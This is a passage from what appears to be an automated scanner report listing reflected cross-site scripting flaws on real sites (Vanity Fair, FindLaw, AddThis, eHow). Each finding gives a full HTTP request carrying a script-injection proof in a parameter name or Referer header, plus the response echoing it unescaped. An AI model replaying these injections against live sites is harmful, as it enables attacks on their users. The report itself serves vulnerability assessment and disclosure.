GET /society/features/2010/12/william-and-kate-201012?9e887"><script>alert(1)</script>2f4ac976e7a=1 HTTP/1.1 Host: www.vanityfair.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: anonId=83593254-73ae-4351-9c4c-078a760fe002; JSESSIONID=adbiApDvmXWRS-T2hEyYs.1; s_pers=%20s_vnum_m%3D1291183200494%2526vn%253D1%7C1291183200494%3B%20s_campaign%3D%7C1291053568083%3B%20sinvisit_m%3Dtrue%7C1291053568087%3B%20s_nr%3D1291051768093%7C1293643768093%3B%20s_eVar10%3D%7C1291053568100%3B%20s_depth%3D2%7C1291053568103%3B%20gpv_p5%3Dno%2520value%7C1291053568117%3B; __utmz=122134540.1291051749.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_vi=[CS]v1|2679EA9005012EC2-6000010600000C56[CE]; ArrivalCookie=ArrivalCookie; __utma=122134540.197414222.1291051749.1291051749.1291051749.1; SiteLifeHost=l3vm204l3pluckcom; mobify=0; __utmc=122134540; __utmb=122134540.2.10.1291051749;
Response
HTTP/1.1 200 OK Server: Resin/3.1.6 Content-Language: en-US Content-Type: text/html; charset=UTF-8 Cache-Control: max-age=300 Expires: Mon, 29 Nov 2010 16:54:34 GMT Date: Mon, 29 Nov 2010 16:49:34 GMT Connection: close Connection: Transfer-Encoding Content-Length: 109781
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/19 ...[SNIP]... <a href="/society/features/2010/12/william-and-kate-201012?printable=true&9e887"><script>alert(1)</script>2f4ac976e7a=1" title="Print this page"> ...[SNIP]...
1.267. http://www.vanityfair.com/style/features/2010/11/bergdorf-goodman-201011 [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.vanityfair.com
Path:
/style/features/2010/11/bergdorf-goodman-201011
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c6ac2"><script>alert(1)</script>e7e858cde0b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /style/features/2010/11/bergdorf-goodman-201011?c6ac2"><script>alert(1)</script>e7e858cde0b=1 HTTP/1.1 Host: www.vanityfair.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: anonId=83593254-73ae-4351-9c4c-078a760fe002; JSESSIONID=adbiApDvmXWRS-T2hEyYs.1; s_pers=%20s_vnum_m%3D1291183200494%2526vn%253D1%7C1291183200494%3B%20s_campaign%3D%7C1291053568083%3B%20sinvisit_m%3Dtrue%7C1291053568087%3B%20s_nr%3D1291051768093%7C1293643768093%3B%20s_eVar10%3D%7C1291053568100%3B%20s_depth%3D2%7C1291053568103%3B%20gpv_p5%3Dno%2520value%7C1291053568117%3B; __utmz=122134540.1291051749.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_vi=[CS]v1|2679EA9005012EC2-6000010600000C56[CE]; ArrivalCookie=ArrivalCookie; __utma=122134540.197414222.1291051749.1291051749.1291051749.1; SiteLifeHost=l3vm204l3pluckcom; mobify=0; __utmc=122134540; __utmb=122134540.2.10.1291051749;
Response
HTTP/1.1 200 OK Server: Resin/3.1.6 Content-Language: en-US Content-Type: text/html; charset=UTF-8 Cache-Control: max-age=300 Expires: Mon, 29 Nov 2010 16:55:07 GMT Date: Mon, 29 Nov 2010 16:50:07 GMT Connection: close Connection: Transfer-Encoding Content-Length: 97809
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/19 ...[SNIP]... <a href="/style/features/2010/11/bergdorf-goodman-201011?printable=true&c6ac2"><script>alert(1)</script>e7e858cde0b=1" title="Print this page"> ...[SNIP]...
1.268. http://www.vanityfair.com/style/giftguide/fanfair-gift-guide-201012 [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.vanityfair.com
Path:
/style/giftguide/fanfair-gift-guide-201012
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3a8b0"><script>alert(1)</script>7c033dc3dd9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /style/giftguide/fanfair-gift-guide-201012?3a8b0"><script>alert(1)</script>7c033dc3dd9=1 HTTP/1.1 Host: www.vanityfair.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: anonId=83593254-73ae-4351-9c4c-078a760fe002; JSESSIONID=adbiApDvmXWRS-T2hEyYs.1; s_pers=%20s_vnum_m%3D1291183200494%2526vn%253D1%7C1291183200494%3B%20s_campaign%3D%7C1291053568083%3B%20sinvisit_m%3Dtrue%7C1291053568087%3B%20s_nr%3D1291051768093%7C1293643768093%3B%20s_eVar10%3D%7C1291053568100%3B%20s_depth%3D2%7C1291053568103%3B%20gpv_p5%3Dno%2520value%7C1291053568117%3B; __utmz=122134540.1291051749.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_vi=[CS]v1|2679EA9005012EC2-6000010600000C56[CE]; ArrivalCookie=ArrivalCookie; __utma=122134540.197414222.1291051749.1291051749.1291051749.1; SiteLifeHost=l3vm204l3pluckcom; mobify=0; __utmc=122134540; __utmb=122134540.2.10.1291051749;
Response
HTTP/1.1 200 OK Server: Resin/3.1.6 Content-Language: en-US Content-Type: text/html; charset=UTF-8 Cache-Control: max-age=300 Expires: Mon, 29 Nov 2010 16:54:59 GMT Date: Mon, 29 Nov 2010 16:49:59 GMT Connection: close Connection: Transfer-Encoding Content-Length: 95195
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/19 ...[SNIP]... <a href="/style/giftguide/fanfair-gift-guide-201012?printable=true&3a8b0"><script>alert(1)</script>7c033dc3dd9=1" title="Print this page"> ...[SNIP]...
1.269. http://www.vanityfair.com/style/giftguide/holiday-beauty-201012 [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.vanityfair.com
Path:
/style/giftguide/holiday-beauty-201012
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7c730"><script>alert(1)</script>4806e76e119 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /style/giftguide/holiday-beauty-201012?7c730"><script>alert(1)</script>4806e76e119=1 HTTP/1.1 Host: www.vanityfair.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: anonId=83593254-73ae-4351-9c4c-078a760fe002; JSESSIONID=adbiApDvmXWRS-T2hEyYs.1; s_pers=%20s_vnum_m%3D1291183200494%2526vn%253D1%7C1291183200494%3B%20s_campaign%3D%7C1291053568083%3B%20sinvisit_m%3Dtrue%7C1291053568087%3B%20s_nr%3D1291051768093%7C1293643768093%3B%20s_eVar10%3D%7C1291053568100%3B%20s_depth%3D2%7C1291053568103%3B%20gpv_p5%3Dno%2520value%7C1291053568117%3B; __utmz=122134540.1291051749.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_vi=[CS]v1|2679EA9005012EC2-6000010600000C56[CE]; ArrivalCookie=ArrivalCookie; __utma=122134540.197414222.1291051749.1291051749.1291051749.1; SiteLifeHost=l3vm204l3pluckcom; mobify=0; __utmc=122134540; __utmb=122134540.2.10.1291051749;
Response
HTTP/1.1 200 OK Server: Resin/3.1.6 Content-Language: en-US Content-Type: text/html; charset=UTF-8 Cache-Control: max-age=300 Expires: Mon, 29 Nov 2010 16:54:58 GMT Date: Mon, 29 Nov 2010 16:49:58 GMT Connection: close Connection: Transfer-Encoding Content-Length: 92899
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/19 ...[SNIP]... <a href="/style/giftguide/holiday-beauty-201012?printable=true&7c730"><script>alert(1)</script>4806e76e119=1" title="Print this page"> ...[SNIP]...
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7b9fe"><script>alert(1)</script>4e108f032ec was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /scripts/search.pl?s=asset HTTP/1.1 Host: dictionary.lp.findlaw.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com/search?hl=en&q=7b9fe"><script>alert(1)</script>4e108f032ec
Response
HTTP/1.1 200 OK Date: Mon, 29 Nov 2010 16:58:35 GMT Server: Apache/1.3.29 (Unix) mod_jk/1.1.0 mod_perl/1.29 Set-Cookie: FindLawTP=TOMPA-Primary-174.122.23.218-21963-1291049915-185886-1719-APMOT; domain=.findlaw.com; path=/; expires=Tue, 29-Nov-11 16:58:35 GMT Cache-Control: max-age=86400, max-age=86400 Expires: Tue, 30 Nov 2010 16:58:35 GMT Connection: close Content-Type: text/html Content-Length: 14108
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html;charset ...[SNIP]... <a href="http://dictionary.lp.findlaw.com/scripts/results.pl?co=www.google.comsearch?hl=en&q=7b9fe"><script>alert(1)</script>4e108f032ec&topic=d4/d46de150a280d2d4c42434db9b6ecec6"> ...[SNIP]...
The value of the Referer HTTP header is copied into the HTML document as plain text between tags. The payload c70f9<script>alert(1)</script>357c087271 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /bookmark.php HTTP/1.1 Host: www.addthis.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com/search?hl=en&q=c70f9<script>alert(1)</script>357c087271
Response
HTTP/1.1 200 OK Date: Mon, 29 Nov 2010 16:46:11 GMT Server: Apache X-Powered-By: PHP/5.2.13 Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8 Set-Cookie: Coyote-2-a0f0083=a0f022f:0; path=/ Content-Length: 88723
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>AddThis Social Bookm ...[SNIP]... <h4>c70f9<script>alert(1)</script>357c087271 - Google search</h4> ...[SNIP]...
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1e245"><script>alert(1)</script>b2ed956b7fc was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /bookmark.php HTTP/1.1 Host: www.addthis.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com/search?hl=en&q=1e245"><script>alert(1)</script>b2ed956b7fc
Response
HTTP/1.1 200 OK Date: Mon, 29 Nov 2010 16:46:10 GMT Server: Apache X-Powered-By: PHP/5.2.13 Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8 Set-Cookie: Coyote-2-a0f0083=a0f021f:0; path=/ Content-Length: 88741
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>AddThis Social Bookm ...[SNIP]... <input type="hidden" id="url" name="url" value="http://www.google.com/search?hl=en&q=1e245"><script>alert(1)</script>b2ed956b7fc" /> ...[SNIP]...
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9f961</script><script>alert(1)</script>292dcc1584c was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /list_6060692_divorce-abandonment-laws-georgia.html/x22 HTTP/1.1 Host: www.ehow.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com/search?hl=en&q=9f961</script><script>alert(1)</script>292dcc1584c
<!DOCTYPE html> <html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/"> <head> <title>eHow | How To Do Just About Everything! | How To ...[SNIP]... obj){ vWin = window.open($(obj).attr("href"),'verisignWindow','height=500,width=560'); if (window.focus){ vWin.focus() } return false; }